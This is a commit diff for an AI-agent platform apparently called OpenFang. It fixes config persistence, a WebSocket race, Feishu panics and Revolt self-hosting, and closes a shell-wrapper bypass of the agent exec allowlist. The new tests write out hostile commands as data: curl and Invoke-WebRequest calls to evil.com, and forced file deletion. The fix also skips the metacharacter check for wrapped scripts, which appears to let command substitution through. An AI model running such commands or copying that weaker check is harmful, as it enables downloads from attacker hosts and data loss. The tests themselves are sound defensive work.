fix config persistence, PowerShell bypass, WS 404 race, feishu panic, Revolt self-hosted

2026-04-25 17:25:11 +02:00 · 2026-04-10 20:51:27 +03:00
parent 0bccba10cf
commit 9323edccf4
8 changed files with 358 additions and 15 deletions
--- a/crates/openfang-api/src/channel_bridge.rs
+++ b/crates/openfang-api/src/channel_bridge.rs
@@ -1470,8 +1470,15 @@ pub async fn start_channel_bridge_with_config(
    // Revolt
    if let Some(ref rv_config) = config.revolt {
        if let Some(token) = read_token(&rv_config.bot_token_env, "Revolt") {
-            let adapter = Arc::new(RevoltAdapter::new(token));
-            adapters.push((adapter, rv_config.default_agent.clone()));
+            let mut adapter = RevoltAdapter::with_urls(
+                token,
+                rv_config.api_url.clone(),
+                rv_config.ws_url.clone(),
+            );
+            if !rv_config.allowed_channels.is_empty() {
+                adapter.set_allowed_channels(rv_config.allowed_channels.clone());
+            }
+            adapters.push((Arc::new(adapter), rv_config.default_agent.clone()));
        }
    }

--- a/crates/openfang-api/src/routes.rs
+++ b/crates/openfang-api/src/routes.rs
@@ -5847,6 +5847,11 @@ pub async fn patch_agent(
    // Persist updated entry to SQLite
    if let Some(entry) = state.kernel.registry.get(agent_id) {
        let _ = state.kernel.memory.save_agent(&entry);
+
+        // Write updated manifest to agent.toml on disk so disk doesn't override
+        // dashboard changes on next boot (#996, #1018).
+        state.kernel.persist_manifest_to_disk(agent_id);
+
        (
            StatusCode::OK,
            Json(
@@ -8992,6 +8997,10 @@ pub async fn patch_agent_config(
        }
    }

+    // Write updated manifest to agent.toml on disk so disk doesn't override
+    // dashboard changes on next boot (#996, #1018).
+    state.kernel.persist_manifest_to_disk(agent_id);
+
    (
        StatusCode::OK,
        Json(serde_json::json!({"status": "ok", "agent_id": id})),
--- a/crates/openfang-api/src/ws.rs
+++ b/crates/openfang-api/src/ws.rs
@@ -197,9 +197,29 @@ pub async fn agent_ws(
        }
    };

-    // Verify agent exists
-    if state.kernel.registry.get(agent_id).is_none() {
-        return axum::http::StatusCode::NOT_FOUND.into_response();
+    // Verify agent exists.
+    // Retry up to 5 times with 200ms backoff to handle a timing race where
+    // the client connects before the agent finishes registering (#804).
+    {
+        let mut found = state.kernel.registry.get(agent_id).is_some();
+        if !found {
+            for attempt in 1..=4 {
+                debug!(
+                    agent_id = %id,
+                    attempt,
+                    "Agent not found yet, retrying in 200ms"
+                );
+                tokio::time::sleep(Duration::from_millis(200)).await;
+                if state.kernel.registry.get(agent_id).is_some() {
+                    found = true;
+                    break;
+                }
+            }
+        }
+        if !found {
+            warn!(agent_id = %id, "Agent not found after 5 lookup attempts");
+            return axum::http::StatusCode::NOT_FOUND.into_response();
+        }
    }

    let id_str = id.clone();
--- a/crates/openfang-channels/src/feishu.rs
+++ b/crates/openfang-channels/src/feishu.rs
@@ -160,7 +160,14 @@ impl DedupCache {

    /// Returns `true` if the ID was already seen (duplicate).
    fn check_and_insert(&self, id: &str) -> bool {
-        let mut ids = self.ids.lock().unwrap();
+        let mut ids = match self.ids.lock() {
+            Ok(guard) => guard,
+            Err(poisoned) => {
+                // Recover from a poisoned mutex rather than panicking.
+                warn!("Dedup cache mutex was poisoned, recovering");
+                poisoned.into_inner()
+            }
+        };
        if ids.iter().any(|s| s == id) {
            return true;
        }
@@ -1030,7 +1037,10 @@ fn combine_payload(
        *entry = vec![Vec::new(); sum];
    }

-    entry[seq] = payload;
+    match entry.get_mut(seq) {
+        Some(slot) => *slot = payload,
+        None => return None,
+    }

    if entry.iter().any(|part| part.is_empty()) {
        return None;
@@ -1105,7 +1115,10 @@ fn extract_text_from_post(content: &serde_json::Value) -> Option<String> {
    let mut text_parts = Vec::new();

    for paragraph in paragraphs {
-        let elements = paragraph.as_array()?;
+        let elements = match paragraph.as_array() {
+            Some(elems) => elems,
+            None => continue,
+        };
        for element in elements {
            let tag = element["tag"].as_str().unwrap_or("");
            match tag {
@@ -1165,8 +1178,10 @@ fn should_respond_in_group(text: &str, mentions: &serde_json::Value, bot_names:

 /// Strip @mention placeholders from text (`@_user_N` format).
 fn strip_mention_placeholders(text: &str) -> String {
-    let re = regex_lite::Regex::new(r"@_user_\d+\s*").unwrap();
-    re.replace_all(text, "").trim().to_string()
+    match regex_lite::Regex::new(r"@_user_\d+\s*") {
+        Ok(re) => re.replace_all(text, "").trim().to_string(),
+        Err(_) => text.trim().to_string(),
+    }
 }

 /// Decrypt an AES-256-CBC encrypted event payload.
--- a/crates/openfang-channels/src/revolt.rs
+++ b/crates/openfang-channels/src/revolt.rs
@@ -94,6 +94,11 @@ impl RevoltAdapter {
        adapter
    }

+    /// Set allowed channel IDs (empty = all channels the bot is in).
+    pub fn set_allowed_channels(&mut self, channels: Vec<String>) {
+        self.allowed_channels = channels;
+    }
+
    /// Add the bot token header to a request builder.
    fn auth_header(&self, builder: reqwest::RequestBuilder) -> reqwest::RequestBuilder {
        builder.header("x-bot-token", self.bot_token.as_str())
--- a/crates/openfang-kernel/src/kernel.rs
+++ b/crates/openfang-kernel/src/kernel.rs
@@ -2986,6 +2986,36 @@ impl OpenFangKernel {
        );
    }

+    /// Persist an agent's manifest to its `agent.toml` on disk so that
+    /// dashboard-driven config changes (model, provider, fallback, etc.)
+    /// survive a restart.  The on-disk file lives at
+    /// `<home_dir>/agents/<name>/agent.toml`.
+    ///
+    /// This is best-effort: a failure to write is logged but does not
+    /// propagate as an error — the authoritative copy lives in SQLite.
+    pub fn persist_manifest_to_disk(&self, agent_id: AgentId) {
+        if let Some(entry) = self.registry.get(agent_id) {
+            let dir = self.config.home_dir.join("agents").join(&entry.name);
+            let toml_path = dir.join("agent.toml");
+            match toml::to_string_pretty(&entry.manifest) {
+                Ok(toml_str) => {
+                    if let Err(e) = std::fs::create_dir_all(&dir) {
+                        warn!(agent = %entry.name, "Failed to create agent dir for manifest persist: {e}");
+                        return;
+                    }
+                    if let Err(e) = std::fs::write(&toml_path, toml_str) {
+                        warn!(agent = %entry.name, "Failed to persist manifest to disk: {e}");
+                    } else {
+                        debug!(agent = %entry.name, path = %toml_path.display(), "Persisted manifest to disk");
+                    }
+                }
+                Err(e) => {
+                    warn!(agent = %entry.name, "Failed to serialize manifest to TOML: {e}");
+                }
+            }
+        }
+    }
+
    /// Switch an agent's model.
    ///
    /// When `explicit_provider` is `Some`, that provider name is used as-is
@@ -3072,6 +3102,9 @@ impl OpenFangKernel {
            let _ = self.memory.save_agent(&entry);
        }

+        // Write updated manifest to agent.toml so changes survive restart (#996, #1018)
+        self.persist_manifest_to_disk(agent_id);
+
        // Clear canonical session to prevent memory poisoning from old model's responses
        let _ = self.memory.delete_canonical_session(agent_id);
        debug!(agent_id = %agent_id, "Cleared canonical session after model switch");
--- a/crates/openfang-runtime/src/subprocess_sandbox.rs
+++ b/crates/openfang-runtime/src/subprocess_sandbox.rs
@@ -164,6 +164,102 @@ fn extract_base_command(cmd: &str) -> &str {
        .unwrap_or(first_word)
 }

+/// Known shell wrappers that can execute inline scripts via flags.
+const SHELL_WRAPPERS: &[&str] = &["powershell", "pwsh", "cmd", "bash", "sh", "zsh"];
+
+/// Known flags that pass inline scripts to shell wrappers.
+/// Each entry is (wrapper_names, flag).
+const SHELL_INLINE_FLAGS: &[(&[&str], &str)] = &[
+    (&["powershell", "pwsh"], "-Command"),
+    (&["powershell", "pwsh"], "-command"),
+    (&["powershell", "pwsh"], "-c"),
+    (&["cmd"], "/c"),
+    (&["cmd"], "/C"),
+    (&["bash", "sh", "zsh"], "-c"),
+    (&["bash", "sh", "zsh"], "--command"),
+];
+
+/// If the base command is a known shell wrapper, extract any inline script
+/// passed via -Command / -c / /c flags and return the commands within it.
+///
+/// Returns the list of base command names found inside the inline script,
+/// or an empty vec if the command is not a shell wrapper or has no inline flag.
+fn extract_shell_wrapper_commands(command: &str) -> Vec<String> {
+    let trimmed = command.trim();
+    let base = extract_base_command(trimmed);
+
+    // Check if the base command is a known shell wrapper (case-insensitive)
+    let base_lower = base.to_lowercase();
+    // Also strip .exe suffix for Windows
+    let base_normalized = base_lower.strip_suffix(".exe").unwrap_or(&base_lower);
+    if !SHELL_WRAPPERS.iter().any(|w| *w == base_normalized) {
+        return Vec::new();
+    }
+
+    // Find the inline flag and extract everything after it
+    for (wrappers, flag) in SHELL_INLINE_FLAGS {
+        if !wrappers.iter().any(|w| *w == base_normalized) {
+            continue;
+        }
+        // Search for the flag in the command args (case-insensitive for PowerShell)
+        let rest = trimmed.split_whitespace().skip(1); // skip the base command
+        let args: Vec<&str> = rest.collect();
+        for (i, arg) in args.iter().enumerate() {
+            if arg.eq_ignore_ascii_case(flag) {
+                // Everything after this flag is the inline script
+                if i + 1 < args.len() {
+                    let script = args[i + 1..].join(" ");
+                    // Strip surrounding quotes if present
+                    let script = script.trim();
+                    let script = if (script.starts_with('"') && script.ends_with('"'))
+                        || (script.starts_with('\'') && script.ends_with('\''))
+                    {
+                        &script[1..script.len() - 1]
+                    } else {
+                        script
+                    };
+                    // Extract commands from the inline script
+                    // For PowerShell, commands can be separated by `;`
+                    // For POSIX shells, by `;`, `&&`, `||`, `|`
+                    return extract_inner_script_commands(script);
+                }
+            }
+        }
+    }
+
+    Vec::new()
+}
+
+/// Extract base command names from an inline script string.
+/// Splits on `;`, `&&`, `||`, `|` and returns the base command of each segment.
+fn extract_inner_script_commands(script: &str) -> Vec<String> {
+    let mut commands = Vec::new();
+    let mut rest = script;
+    while !rest.is_empty() {
+        let separators: &[&str] = &["&&", "||", "|", ";"];
+        let mut earliest_pos = rest.len();
+        let mut earliest_len = 0;
+        for sep in separators {
+            if let Some(pos) = rest.find(sep) {
+                if pos < earliest_pos {
+                    earliest_pos = pos;
+                    earliest_len = sep.len();
+                }
+            }
+        }
+        let segment = &rest[..earliest_pos];
+        let base = extract_base_command(segment);
+        if !base.is_empty() {
+            commands.push(base.to_string());
+        }
+        if earliest_pos + earliest_len >= rest.len() {
+            break;
+        }
+        rest = &rest[earliest_pos + earliest_len..];
+    }
+    commands
+}
+
 /// Extract all commands from a shell command string.
 /// Handles pipes (`|`), semicolons (`;`), `&&`, and `||`.
 fn extract_all_commands(command: &str) -> Vec<&str> {
@@ -215,11 +311,22 @@ pub fn validate_command_allowlist(command: &str, policy: &ExecPolicy) -> Result<
        ExecSecurityMode::Allowlist => {
            // SECURITY: Check for shell metacharacters BEFORE base-command extraction.
            // These can smuggle commands inside arguments of allowed binaries.
-            if let Some(reason) = contains_shell_metacharacters(command) {
-                return Err(format!(
-                    "Command blocked: contains {reason}. Shell metacharacters are not allowed in Allowlist mode."
-                ));
+            //
+            // However, we must skip this check for commands wrapped in a known
+            // shell wrapper (e.g. `powershell -Command "..."`) because the
+            // inline script naturally contains metacharacters (quotes, semicolons).
+            // Those inner commands are validated separately below.
+            let inner_commands = extract_shell_wrapper_commands(command);
+            let is_shell_wrapper = !inner_commands.is_empty();
+
+            if !is_shell_wrapper {
+                if let Some(reason) = contains_shell_metacharacters(command) {
+                    return Err(format!(
+                        "Command blocked: contains {reason}. Shell metacharacters are not allowed in Allowlist mode."
+                    ));
+                }
            }
+
            let base_commands = extract_all_commands(command);
            for base in &base_commands {
                // Check safe_bins first
@@ -235,6 +342,28 @@ pub fn validate_command_allowlist(command: &str, policy: &ExecPolicy) -> Result<
                    base
                ));
            }
+
+            // SECURITY (#794): If the outer command is a shell wrapper
+            // (powershell, cmd, bash, etc.), also validate all commands
+            // found inside the inline script. This prevents bypassing the
+            // allowlist by wrapping disallowed commands inside an allowed
+            // shell.
+            if is_shell_wrapper {
+                for inner_cmd in &inner_commands {
+                    if policy.safe_bins.iter().any(|sb| sb == inner_cmd) {
+                        continue;
+                    }
+                    if policy.allowed_commands.iter().any(|ac| ac == inner_cmd) {
+                        continue;
+                    }
+                    return Err(format!(
+                        "Command '{}' (inside shell wrapper) is not in the exec allowlist. \
+                         Add it to exec_policy.allowed_commands or exec_policy.safe_bins.",
+                        inner_cmd
+                    ));
+                }
+            }
+
            Ok(())
        }
    }
@@ -928,6 +1057,124 @@ mod tests {
        );
    }

+    // ── Shell wrapper bypass tests (issue #794) ────────────────────────
+
+    #[test]
+    fn test_issue_794_powershell_command_bypass_blocked() {
+        let policy = ExecPolicy {
+            mode: ExecSecurityMode::Allowlist,
+            allowed_commands: vec!["powershell".to_string()],
+            ..ExecPolicy::default()
+        };
+        // "Remove-Item" is NOT in allowed_commands — must be blocked
+        let result = validate_command_allowlist(
+            r#"powershell -Command "Remove-Item -Recurse -Force C:\temp""#,
+            &policy,
+        );
+        assert!(
+            result.is_err(),
+            "Remove-Item inside powershell -Command must be blocked (issue #794)"
+        );
+        let err = result.unwrap_err();
+        assert!(
+            err.contains("Remove-Item"),
+            "Error should name the blocked inner command, got: {err}"
+        );
+    }
+
+    #[test]
+    fn test_powershell_command_allowed_when_inner_listed() {
+        let policy = ExecPolicy {
+            mode: ExecSecurityMode::Allowlist,
+            allowed_commands: vec!["powershell".to_string(), "Get-Process".to_string()],
+            ..ExecPolicy::default()
+        };
+        let result = validate_command_allowlist(
+            r#"powershell -Command "Get-Process""#,
+            &policy,
+        );
+        assert!(
+            result.is_ok(),
+            "Get-Process should be allowed when in allowed_commands"
+        );
+    }
+
+    #[test]
+    fn test_cmd_c_bypass_blocked() {
+        let policy = ExecPolicy {
+            mode: ExecSecurityMode::Allowlist,
+            allowed_commands: vec!["cmd".to_string()],
+            ..ExecPolicy::default()
+        };
+        let result = validate_command_allowlist(
+            r#"cmd /C "del /F /Q C:\temp\secret.txt""#,
+            &policy,
+        );
+        assert!(
+            result.is_err(),
+            "del inside cmd /C must be blocked when not in allowlist"
+        );
+    }
+
+    #[test]
+    fn test_bash_c_bypass_blocked() {
+        let policy = ExecPolicy {
+            mode: ExecSecurityMode::Allowlist,
+            allowed_commands: vec!["bash".to_string()],
+            ..ExecPolicy::default()
+        };
+        let result = validate_command_allowlist(
+            r#"bash -c "curl https://evil.com""#,
+            &policy,
+        );
+        assert!(
+            result.is_err(),
+            "curl inside bash -c must be blocked when not in allowlist"
+        );
+    }
+
+    #[test]
+    fn test_bash_c_allowed_when_inner_listed() {
+        let policy = ExecPolicy {
+            mode: ExecSecurityMode::Allowlist,
+            allowed_commands: vec!["bash".to_string()],
+            ..ExecPolicy::default()
+        };
+        // "echo" is in safe_bins by default
+        let result = validate_command_allowlist(
+            r#"bash -c "echo hello""#,
+            &policy,
+        );
+        assert!(
+            result.is_ok(),
+            "echo inside bash -c should be allowed (echo is in safe_bins)"
+        );
+    }
+
+    #[test]
+    fn test_pwsh_command_bypass_blocked() {
+        let policy = ExecPolicy {
+            mode: ExecSecurityMode::Allowlist,
+            allowed_commands: vec!["pwsh".to_string()],
+            ..ExecPolicy::default()
+        };
+        let result = validate_command_allowlist(
+            r#"pwsh -Command "Invoke-WebRequest https://evil.com""#,
+            &policy,
+        );
+        assert!(
+            result.is_err(),
+            "Invoke-WebRequest inside pwsh must be blocked"
+        );
+    }
+
+    #[test]
+    fn test_shell_wrapper_extract_no_flag() {
+        // When powershell is called without -Command, no inner commands are extracted
+        let cmds = extract_shell_wrapper_commands("powershell script.ps1");
+        assert!(cmds.is_empty());
+    }
+
    #[test]
    fn test_extract_all_commands_cjk_separators() {
        // Ensure extract_all_commands handles CJK content between separators
--- a/crates/openfang-types/src/config.rs
+++ b/crates/openfang-types/src/config.rs
@@ -2618,8 +2618,13 @@ impl Default for MqttConfig {
 pub struct RevoltConfig {
    /// Env var name holding the bot token.
    pub bot_token_env: String,
-    /// Revolt API URL.
+    /// Revolt API URL (set to your self-hosted instance URL if not using revolt.chat).
    pub api_url: String,
+    /// Revolt WebSocket URL (set to your self-hosted instance WS URL if not using revolt.chat).
+    pub ws_url: String,
+    /// Restrict to specific channel IDs (empty = all channels the bot is in).
+    #[serde(default)]
+    pub allowed_channels: Vec<String>,
    /// Default agent name to route messages to.
    pub default_agent: Option<String>,
    /// Per-channel behavior overrides.
@@ -2632,6 +2637,8 @@ impl Default for RevoltConfig {
        Self {
            bot_token_env: "REVOLT_BOT_TOKEN".to_string(),
            api_url: "https://api.revolt.chat".to_string(),
+            ws_url: "wss://ws.revolt.chat".to_string(),
+            allowed_channels: Vec::new(),
            default_agent: None,
            overrides: ChannelOverrides::default(),
        }